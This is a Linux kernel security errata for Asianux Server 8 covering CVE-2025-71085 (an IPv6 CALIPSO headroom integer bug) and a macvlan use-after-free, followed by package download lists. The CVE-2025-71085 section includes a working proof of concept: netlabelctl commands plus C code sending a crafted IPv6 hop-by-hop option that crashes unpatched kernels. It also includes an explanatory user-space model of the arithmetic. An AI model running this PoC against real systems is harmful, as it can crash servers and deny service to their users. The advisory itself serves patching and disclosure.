kernel-4.18.0-553.111.1.el8_10

Errata ID: AXSA:2026-310:19

Release date: 
Monday, March 16, 2026 - 18:12
Subject: 
kernel-4.18.0-553.111.1.el8_10
Affected Channels: 
Asianux Server 8 for x86_64
Severity: 
Moderate
Description: 

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

* kernel: ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr() (CVE-2025-71085)
* kernel: macvlan: fix possible UAF in macvlan_forward_source() (CVE-2026-23001)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

CVE-2025-71085
In the Linux kernel, the following vulnerability has been resolved:

ipv6: BUG() in pskb_expand_head() as part of calipso_skbuff_setattr()

There exists a kernel oops caused by a BUG_ON(nhead < 0) at net/core/skbuff.c:2232 in pskb_expand_head(). This bug is triggered as part of the calipso_skbuff_setattr() routine when skb_cow() is passed headroom > INT_MAX (i.e. (int)(skb_headroom(skb) + len_delta) < 0).

The root cause of the bug is due to an implicit integer cast in __skb_cow(). The check (headroom > skb_headroom(skb)) is meant to ensure that delta = headroom - skb_headroom(skb) is never negative, otherwise we will trigger a BUG_ON in pskb_expand_head(). However, if headroom > INT_MAX and delta <= -NET_SKB_PAD, the check passes, delta becomes negative, and pskb_expand_head() is passed a negative value for nhead.

Fix the trigger condition in calipso_skbuff_setattr(). Avoid passing "negative" headroom sizes to skb_cow() within calipso_skbuff_setattr() by only using skb_cow() to grow headroom.

PoC:

Using `netlabelctl` tool:

    netlabelctl map del default
    netlabelctl calipso add pass doi:7
    netlabelctl map add default address:0::1/128 protocol:calipso,7

Then run the following PoC:

    int fd = socket(AF_INET6, SOCK_DGRAM, IPPROTO_UDP);

    // setup msghdr
    int cmsg_size = 2;
    int cmsg_len = 0x60;
    struct msghdr msg;
    struct sockaddr_in6 dest_addr;
    struct cmsghdr * cmsg = (struct cmsghdr *) calloc(1, sizeof(struct cmsghdr) + cmsg_len);
    msg.msg_name = &dest_addr;
    msg.msg_namelen = sizeof(dest_addr);
    msg.msg_iov = NULL;
    msg.msg_iovlen = 0;
    msg.msg_control = cmsg;
    msg.msg_controllen = cmsg_len;
    msg.msg_flags = 0;

    // setup sockaddr
    dest_addr.sin6_family = AF_INET6;
    dest_addr.sin6_port = htons(31337);
    dest_addr.sin6_flowinfo = htonl(31337);
    dest_addr.sin6_addr = in6addr_loopback;
    dest_addr.sin6_scope_id = 31337;

    // setup cmsghdr
    cmsg->cmsg_len = cmsg_len;
    cmsg->cmsg_level = IPPROTO_IPV6;
    cmsg->cmsg_type = IPV6_HOPOPTS;
    char * hop_hdr = (char *)cmsg + sizeof(struct cmsghdr);
    hop_hdr[1] = 0x9; //set hop size - (0x9 + 1) * 8 = 80

    sendmsg(fd, &msg, 0);

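
The integer handling described for CVE-2025-71085, as a user-space model added here for illustration (not kernel source and not part of the advisory). It reproduces only the arithmetic of the headroom check and of a grow-only caller; NET_SKB_PAD = 64, the function names and the sample values are assumptions, and the cloned-skb case is ignored.

```c
#include <stdio.h>

/* Assumed for this model: NET_SKB_PAD is 64 on typical x86_64 builds. */
#define NET_SKB_PAD 64
/* Round x up to a multiple of a (power of two), like the kernel's ALIGN(). */
#define ALIGN_UP(x, a) (((x) + ((a) - 1)) & ~((a) - 1))

/*
 * Model of the arithmetic in __skb_cow(): returns the nhead value that
 * would reach pskb_expand_head(), or 0 when no expansion is requested.
 */
int model_cow_nhead(unsigned int cur_headroom, unsigned int want_headroom)
{
    int delta = 0;

    /* Unsigned compare: a "negative" request looks like a huge one. */
    if (want_headroom > cur_headroom)
        delta = (int)(want_headroom - cur_headroom); /* wraps negative above INT_MAX */

    /* Rounding up hides -NET_SKB_PAD < delta < 0, but not delta <= -NET_SKB_PAD. */
    return ALIGN_UP(delta, NET_SKB_PAD);
}

/* Caller before the fix: a shrinking option (len_delta < 0) is added as-is. */
unsigned int headroom_request_unpatched(unsigned int cur, int len_delta)
{
    return cur + (unsigned int)len_delta;
}

/* Caller following the advisory's fix description: only ever ask to grow. */
unsigned int headroom_request_grow_only(unsigned int cur, int len_delta)
{
    return cur + (unsigned int)(len_delta > 0 ? len_delta : 0);
}

int main(void)
{
    /* Constructed sample values: current headroom and option length change. */
    unsigned int cur[] = { 16, 4, 16 };
    int len_delta[] = { -80, -10, 8 };

    for (int i = 0; i < 3; i++) {
        int bad = model_cow_nhead(cur[i], headroom_request_unpatched(cur[i], len_delta[i]));
        int ok = model_cow_nhead(cur[i], headroom_request_grow_only(cur[i], len_delta[i]));
        printf("headroom=%u len_delta=%d nhead: unpatched=%d grow-only=%d%s\n",
               cur[i], len_delta[i], bad, ok, bad < 0 ? "  <- BUG_ON(nhead < 0)" : "");
    }
    return 0;
}
```
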
CVE-2026-23001
In the Linux kernel, the following vulnerability has been resolved:

macvlan: fix possible UAF in macvlan_forward_source()

Add RCU protection on (struct macvlan_source_entry)->vlan. Whenever macvlan_hash_del_source() is called, we must clear entry->vlan pointer before RCU grace period starts. This allows macvlan_forward_source() to skip over entries queued for freeing.

Note that macvlan_dev are already RCU protected, as they are embedded in a standard netdev (netdev_priv(ndev)).

https://lore.kernel.org/netdev/695fb1e8.050a0220.1c677c.039f.GAE@google.com/T/#u

Solution: 

Update packages.

Additional Info: 

N/A

Download: 

SRPMS
  1. kernel-4.18.0-553.111.1.el8_10.src.rpm
    MD5: e3a2e61f4dbfe238601244775c021eda
    SHA-256: a84eb0f84e9b4f2220a3db2990bef6c1613e573e4965640ef7a2416b07a8e5c6
    Size: 132.35 MB

Asianux Server 8 for x86_64
  1. bpftool-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: c4b045b812063cd9c4ee56ea07dcb05f
    SHA-256: abb88e8d795827d3012603bcb4f78ff29b4e65d998e4a00736455047dce68e65
    Size: 11.28 MB
  2. kernel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: f466ed192d30e7aeda0a9d5b442a853b
    SHA-256: 2eb549c8d10b281e81f63038021aebdfb10bf51ef77b64477e1a834417a516d2
    Size: 10.56 MB
  3. kernel-abi-stablelists-4.18.0-553.111.1.el8_10.noarch.rpm
    MD5: 5444583b6badf917dfad96c10ee7da48
    SHA-256: 8e450de9ca796f36e85e23529e87c44e938e101c1a671d5256a82c2955b9bfab
    Size: 10.57 MB
  4. kernel-core-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 7392ebf1c78c641107870fc79d74549b
    SHA-256: ac20eed445df90611e93c26f9db76d1aa6a804fe346953c9366fbea73bba0cda
    Size: 43.59 MB
  5. kernel-cross-headers-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: a4d42330e721cbe8d39981ceb6fd0e79
    SHA-256: e82ae24720fbf2745493648ec6f2814b80811be87da2ba990e462262edc2b4e9
    Size: 15.90 MB
  6. kernel-debug-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: b48bfb225c57abb7ed6aa88378966cc4
    SHA-256: 85dfc33201ff27e0720fbd29cdeab6d0f1622d4ee9a9bbf77cb8b188905b86a5
    Size: 10.55 MB
  7. kernel-debug-core-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 95e74dd9d4e2ca9e9e64c9741537e487
    SHA-256: 7dce15be0d3ed7b9d2353e6def841d213f666a2473fabc8bafcda7d44e133314
    Size: 72.90 MB
  8. kernel-debug-devel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: ca3d296670b9bec18c0b8c67a1f29424
    SHA-256: 9782430735a0ca97d8a829ee48bfc949be20ee9dad02716add4707486c01af7b
    Size: 24.40 MB
  9. kernel-debug-modules-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 29f04e7700d18b357e0c94b1a22b7a9b
    SHA-256: a48d15471f0523d83ebcd5477c2ef0ace6d94bfff0c41f7a65948094f5126770
    Size: 66.02 MB
  10. kernel-debug-modules-extra-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 4230847dca1e7904c679dda55fb80389
    SHA-256: 0e73024441a84114c52169b84c44778756702c08b27d66de827bda0e9ca95fff
    Size: 11.93 MB
  11. kernel-devel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 4b69d8c23a996f9959ca334179d68ffe
    SHA-256: 00ec529b45c1f0779d88c50f039be1fbda61836597741a99412bd75523c80bf7
    Size: 24.20 MB
  12. kernel-doc-4.18.0-553.111.1.el8_10.noarch.rpm
    MD5: 36a3ae1f15e039c12fe925925291b08a
    SHA-256: 9c838af0676de0edf629d8a87008b64061e1614534236343e96771ad75e5407e
    Size: 28.43 MB
  13. kernel-headers-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 66e82034ce8325a21fb812ea8e1b0928
    SHA-256: 17f3539bb6f414698ead002ff0de8429c34b457b15ba3c1a33747a270b14b859
    Size: 11.91 MB
  14. kernel-modules-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 1a6d999425c8462cec58326ec6f25b67
    SHA-256: 147d8055e9e7a6e8c4a989003c08d7ff4a2c7ae3e1826b7b3222245c6b0a2fc9
    Size: 36.40 MB
  15. kernel-modules-extra-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 8dcc261adf0bbac05c577e22724da01f
    SHA-256: e1b2beac3a93a3c5e138eec15fb0504f02277c7dd4afa8b566a52014368bd0bf
    Size: 11.24 MB
  16. kernel-tools-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: fa956c37e0719b2bcdc16c32ff7c20f0
    SHA-256: c05975f3b1dc789d92877eedf8ec114024589e53e7b3361816f6d5483a6aa7c4
    Size: 10.77 MB
  17. kernel-tools-libs-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: cac862b17446e016f87804ca819faaaa
    SHA-256: 3aad828496f1e71eb33f9755f41d0c760d76e9d77a285865950ec789ed5067b8
    Size: 10.56 MB
  18. kernel-tools-libs-devel-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 23aadb39608d546be2dc8f4615e1afd4
    SHA-256: ab0379582718e6eea87bb042ae443ffaa894d799cedbe2a12e7a1603894ed3d8
    Size: 10.56 MB
  19. perf-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 3f21b3f7cd0f80ec49cb379d77368422
    SHA-256: 3e022f8db0d28803f8630728f9a95e773c580fe0573908497105beab83d4332c
    Size: 12.88 MB
  20. python3-perf-4.18.0-553.111.1.el8_10.x86_64.rpm
    MD5: 2c8de097c64a54ea5e65d45c8d19c8b9
    SHA-256: 51e9b2b17d8ff7a8ea67831b010277b0d661fd07a80cd1b67658a55e85d75f0d
    Size: 10.68 MB